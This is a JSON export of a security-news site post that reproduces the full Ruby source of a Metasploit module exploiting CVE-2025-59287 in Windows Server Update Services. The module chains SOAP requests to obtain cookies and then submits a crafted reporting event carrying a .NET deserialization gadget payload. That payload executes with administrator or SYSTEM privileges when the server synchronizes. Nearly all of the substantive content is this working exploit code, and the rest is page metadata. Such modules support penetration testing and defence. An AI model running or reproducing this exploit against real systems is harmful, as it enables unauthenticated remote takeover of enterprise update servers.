{"id":25958,"date":"2025-11-12T13:39:15","date_gmt":"2025-11-12T13:39:15","guid":{"rendered":"http:\/\/localhost\/?p=25958"},"modified":"2025-11-12T13:39:15","modified_gmt":"2025-11-12T13:39:15","slug":"windows-server-update-service-deserialization-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=25958","title":{"rendered":"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE-"},"content":{"rendered":"

{“lastseen”:”2025-11-12T19:04:28″,”description”:”This module exploits deserialization vulnerability…”,”published”:”2025-11-12T18:56:54″,”modified”:”2025-11-12T18:56:54″,”type”:”metasploit”,”title”:”Windows Server Update Service Deserialization Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59287″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = GreatRanking\\n\\n include Exploit::Remote::HttpClient\\n include Msf::Util::DotNetDeserialization\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Windows Server Update Service Deserialization Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits deserialization vulnerability in legacy serialization mechanism in Windows Server Update Services (WSUS). The vulnerability allows unauthenticated attacker to create specially crafted event, which triggers unsafe deserialization upon server synchronization. The module does not require any other options and upon successful exploitation, the payload is executed in context of administrator.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘mwulftange’, # security research\\n ‘msutovsky-r7’ # module development\\n ],\\n ‘References’ =\\u003e [\\n [ ‘ATT\\u0026CK’, Mitre::Attack::Technique::T1190_EXPLOIT_PUBLIC_FACING_APPLICATION],\\n [ ‘URL’, ‘https:\/\/code-white.com\/blog\/wsus-cve-2025-59287-analysis\/’],\\n [ ‘CVE’, ‘2025-59287’]\\n ],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Platform’ =\\u003e ‘win’,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e ‘8530’,\\n ‘WfsDelay’ =\\u003e 900 # need to wait for WSUS to try synchronize\\n },\\n ‘Targets’ =\\u003e [\\n [ ‘Windows’, {}]\\n ],\\n\\n ‘DisclosureDate’ =\\u003e ‘2025-10-14’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SERVICE_RESTARTS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, SCREEN_EFFECTS]\\n }\\n )\\n )\\n end\\n\\n def get_soap_response_xml(path, soap_action, data)\\n res = send_request_cgi({\\n ‘uri’ =\\u003e path,\\n ‘method’ =\\u003e ‘POST’,\\n ‘headers’ =\\u003e {\\n ‘SOAPAction’ =\\u003e soap_action\\n },\\n ‘ctype’ =\\u003e ‘text\/xml’,\\n ‘data’ =\\u003e data\\n })\\n\\n fail_with(Failure::UnexpectedReply, ‘Received unexpected response from WSUS’) unless res\\u0026.code == 200\\n xml = res.get_xml_document\\n xml.remove_namespaces!\\n xml\\n end\\n\\n def get_server_id\\n soap_body = \\u003c\\u003c~XML\\n \\u003c?xml version=\\”1.0\\” encoding=\\”utf-8\\”?\\u003e\\n \\u003csoap:Envelope xmlns:soap=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\”\\u003e\\n \\u003csoap:Body\\u003e\\n \\u003cGetRollupConfiguration xmlns=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\\”\\u003e\\n \\u003ccookie xmlns:i=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\” i:nil=\\”true\\”\/\\u003e\\n \\u003c\/GetRollupConfiguration\\u003e\\n \\u003c\/soap:Body\\u003e\\n \\u003c\/soap:Envelope\\u003e\\n XML\\n\\n xml = get_soap_response_xml(normalize_uri(‘ReportingWebService’, ‘ReportingWebService.asmx’), ‘http:\/\/www.microsoft.com\/SoftwareDistribution\/GetRollupConfiguration’, soap_body)\\n\\n @server_id = xml.xpath(‘\/\/ServerId’).text.to_s\\n\\n fail_with(Failure::Unknown, ‘Failed to get server ID’) unless @server_id\\n end\\n\\n def get_auth_cookie\\n soap_body = \\u003c\\u003c~XML\\n \\u003c?xml version=\\”1.0\\” encoding=\\”utf-8\\”?\\u003e\\n \\u003csoap:Envelope xmlns:soap=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\”\\u003e\\n \\u003csoap:Body\\u003e\\n \\u003cGetAuthorizationCookie xmlns=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\/Server\/SimpleAuthWebService\\”\\u003e\\n \\u003cclientId\\u003e#{@server_id}\\u003c\/clientId\\u003e\\n \\u003ctargetGroupName\\u003e\\u003c\/targetGroupName\\u003e\\n \\u003cdnsName\\u003e#{Rex::Text.rand_text_alpha_lower(4..8)}\\u003c\/dnsName\\u003e\\n \\u003c\/GetAuthorizationCookie\\u003e\\n \\u003c\/soap:Body\\u003e\\n \\u003c\/soap:Envelope\\u003e\\n XML\\n\\n xml = get_soap_response_xml(normalize_uri(‘SimpleAuthWebService’, ‘SimpleAuth.asmx’), ‘http:\/\/www.microsoft.com\/SoftwareDistribution\/Server\/SimpleAuthWebService\/GetAuthorizationCookie’, soap_body)\\n\\n @auth_cookie = xml.xpath(‘\/\/CookieData’).text.to_s\\n @plugin_id = xml.xpath(‘\/\/PlugInId’).text.to_s\\n fail_with(Failure::Unknown, ‘Failed to get authentication cookie’) unless @auth_cookie \\u0026\\u0026 @plugin_id\\n end\\n\\n def get_reporting_parameters\\n timenow = Time.now.strftime(‘%Y-%m-%dT%H:%M:%SZ’)\\n\\n soap_body = \\u003c\\u003c~XML\\n \\u003c?xml version=\\”1.0\\” encoding=\\”utf-8\\”?\\u003e\\n \\u003csoap:Envelope xmlns:soap=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\”\\u003e\\n \\u003csoap:Body\\u003e\\n \\u003cGetCookie xmlns=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\/Server\/ClientWebService\\”\\u003e\\n \\u003cauthCookies\\u003e\\n \\u003cAuthorizationCookie\\u003e\\n \\u003cPlugInId\\u003e#{@plugin_id}\\u003c\/PlugInId\\u003e\\n \\u003cCookieData\\u003e#{@auth_cookie}\\u003c\/CookieData\\u003e\\n \\u003c\/AuthorizationCookie\\u003e\\n \\u003c\/authCookies\\u003e\\n \\u003coldCookie xmlns:i=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\” i:nil=\\”true\\”\/\\u003e\\n \\u003clastChange\\u003e#{timenow}\\u003c\/lastChange\\u003e\\n \\u003ccurrentTime\\u003e#{timenow}\\u003c\/currentTime\\u003e\\n \\u003cprotocolVersion\\u003e1.20\\u003c\/protocolVersion\\u003e\\n \\u003c\/GetCookie\\u003e\\n \\u003c\/soap:Body\\u003e\\n \\u003c\/soap:Envelope\\u003e\\n XML\\n\\n xml = get_soap_response_xml(normalize_uri(‘ClientWebService’, ‘Client.asmx’), ‘http:\/\/www.microsoft.com\/SoftwareDistribution\/Server\/ClientWebService\/GetCookie’, soap_body)\\n\\n @encrypted_data = xml.xpath(‘\/\/EncryptedData’).text.to_s\\n @expiration = xml.xpath(‘\/\/Expiration’).text.to_s\\n\\n fail_with(Failure::Unknown, ‘Failed to get reporting parameters’) unless @encrypted_data \\u0026\\u0026 @expiration\\n end\\n\\n def create_malicious_event\\n timenow = Time.now.strftime(‘%Y-%m-%dT%H:%M:%SZ’)\\n payload_data = ::Msf::Util::DotNetDeserialization.generate(\\n payload.encoded,\\n gadget_chain: :WindowsIdentity,\\n formatter: :SoapFormatter\\n )\\n\\n soap_body = \\u003c\\u003c~XML\\n \\u003csoap:Envelope xmlns:soap=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\” xmlns:xsi=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\” xmlns:xsd=\\”http:\/\/www.w3.org\/2001\/XMLSchema\\” xmlns:soapenc=\\”http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\\”\\u003e\\n \\u003csoap:Body\\u003e\\n \\u003cReportEventBatch xmlns=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\\”\\u003e\\n \\u003ccookie\\u003e\\n \\u003cExpiration\\u003e#{@expiration}\\u003c\/Expiration\\u003e\\n \\u003cEncryptedData\\u003e#{@encrypted_data}\\u003c\/EncryptedData\\u003e\\n \\u003c\/cookie\\u003e\\n \\u003cclientTime\\u003e#{timenow}\\u003c\/clientTime\\u003e\\n \\u003ceventBatch xmlns:q1=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\\” soapenc:arrayType=\\”q1:ReportingEvent[1]\\”\\u003e\\n \\u003cReportingEvent\\u003e\\n \\u003cBasicData\\u003e\\n \\u003cTargetID\\u003e\\n \\u003cSid\\u003e#{SecureRandom.uuid.strip}\\u003c\/Sid\\u003e\\n \\u003c\/TargetID\\u003e\\n \\u003cSequenceNumber\\u003e0\\u003c\/SequenceNumber\\u003e\\n \\u003cTimeAtTarget\\u003e#{timenow}\\u003c\/TimeAtTarget\\u003e\\n \\u003cEventInstanceID\\u003e#{SecureRandom.uuid.strip}\\u003c\/EventInstanceID\\u003e\\n \\u003cNamespaceID\\u003e2\\u003c\/NamespaceID\\u003e\\n \\u003cEventID\\u003e389\\u003c\/EventID\\u003e\\n \\u003cSourceID\\u003e301\\u003c\/SourceID\\u003e\\n \\u003cUpdateID\\u003e\\n \\u003cUpdateID\\u003e#{SecureRandom.uuid.strip}\\u003c\/UpdateID\\u003e\\n \\u003cRevisionNumber\\u003e0\\u003c\/RevisionNumber\\u003e\\n \\u003c\/UpdateID\\u003e\\n \\u003cWin32HResult\\u003e0\\u003c\/Win32HResult\\u003e\\n \\u003cAppName\\u003e#{Rex::Text.rand_text_alpha_lower(4..8)}\\u003c\/AppName\\u003e\\n \\u003c\/BasicData\\u003e\\n \\u003cExtendedData\\u003e\\n \\u003cMiscData soapenc:arrayType=\\”xsd:string[2]\\”\\u003e\\n \\u003cstring\\u003eAdministrator=SYSTEM\\u003c\/string\\u003e\\n \\u003cstring\\u003eSynchronizationUpdateErrorsKey=#{Rex::Text.html_encode(payload_data)}\\u003c\/string\\u003e\\n \\u003c\/MiscData\\u003e\\n \\u003c\/ExtendedData\\u003e\\n \\u003cPrivateData\\u003e\\n \\u003cComputerDnsName\\u003e\\u003c\/ComputerDnsName\\u003e\\n \\u003cUserAccountName\\u003e\\u003c\/UserAccountName\\u003e\\n \\u003c\/PrivateData\\u003e\\n \\u003c\/ReportingEvent\\u003e\\n \\u003c\/eventBatch\\u003e\\n \\u003c\/ReportEventBatch\\u003e\\n \\u003c\/soap:Body\\u003e\\n \\u003c\/soap:Envelope\\u003e\\n XML\\n\\n xml = get_soap_response_xml(normalize_uri(‘ReportingWebService’, ‘ReportingWebService.asmx’), ‘http:\/\/www.microsoft.com\/SoftwareDistribution\/ReportEventBatch’, soap_body)\\n\\n fail_with(Failure::PayloadFailed, ‘Failed to create malicious report, target might be not vulnerable’) unless xml.xpath(‘\/\/ReportEventBatchResult’).text.to_s == ‘true’\\n end\\n\\n ##\\n # Could not find better way to check if target is running vulnerable WSUS, leaving it for now with checking for presence of WSUS\\n ##\\n def check\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’\\n })\\n return CheckCode::Safe(‘Target does not run WSUS’) unless res\\u0026.code == 200 \\u0026\\u0026 res.headers[‘Server’] == ‘Microsoft-IIS\/10.0’\\n\\n CheckCode::Detected(‘Target is probably running WSUS’)\\n end\\n\\n def exploit\\n vprint_status(‘Getting server ID’)\\n get_server_id\\n vprint_status(‘Getting authentication cookie’)\\n get_auth_cookie\\n vprint_status(‘Getting reporting cookie’)\\n get_reporting_parameters\\n vprint_status(‘Trying to create malicious event’)\\n create_malicious_event\\n vprint_status(‘Created malicious event, now waiting for WSUS to sync’)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/http\/wsus_deserialization_rce.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/http\/wsus_deserialization_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-11-12T19:04:28″,”description”:”This module exploits deserialization vulnerability…”,”published”:”2025-11-12T18:56:54″,”modified”:”2025-11-12T18:56:54″,”type”:”metasploit”,”title”:”Windows Server Update Service Deserialization Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59287″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank =…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-25958","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nWindows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=25958\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-11-12T19:04:28″,”description”:”This module exploits deserialization vulnerability…”,”published”:”2025-11-12T18:56:54″,”modified”:”2025-11-12T18:56:54″,”type”:”metasploit”,”title”:”Windows Server Update Service Deserialization Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59287″],”sourceData”:”##n# This module requires Metasploit: https:\/\/metasploit.com\/downloadn# Current source: https:\/\/github.com\/rapid7\/metasploit-frameworkn##nnclass MetasploitModule u003c Msf::Exploit::Remoten Rank =...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=25958\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-12T13:39:15+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25958#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25958\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE-\",\"datePublished\":\"2025-11-12T13:39:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25958\"},\"wordCount\":1661,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=25958#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25958\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25958\",\"name\":\"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-12T13:39:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25958#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=25958\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25958#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=25958","og_locale":"en_US","og_type":"article","og_title":"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE- zero redgem","og_description":"{“lastseen”:”2025-11-12T19:04:28″,”description”:”This module exploits deserialization vulnerability…”,”published”:”2025-11-12T18:56:54″,”modified”:”2025-11-12T18:56:54″,”type”:”metasploit”,”title”:”Windows Server Update Service Deserialization Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59287″],”sourceData”:”##n# This module requires Metasploit: https:\/\/metasploit.com\/downloadn# Current source: https:\/\/github.com\/rapid7\/metasploit-frameworkn##nnclass MetasploitModule u003c Msf::Exploit::Remoten Rank =...","og_url":"https:\/\/zero.redgem.net\/?p=25958","og_site_name":"zero redgem","article_published_time":"2025-11-12T13:39:15+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=25958#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=25958"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE-","datePublished":"2025-11-12T13:39:15+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=25958"},"wordCount":1661,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=25958#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=25958","url":"https:\/\/zero.redgem.net\/?p=25958","name":"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-12T13:39:15+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=25958#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=25958"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=25958#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Windows Server Update Service Deserialization Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-WSUS_DESERIALIZATION_RCE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/25958","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25958"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/25958\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25958"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25958"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25958"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}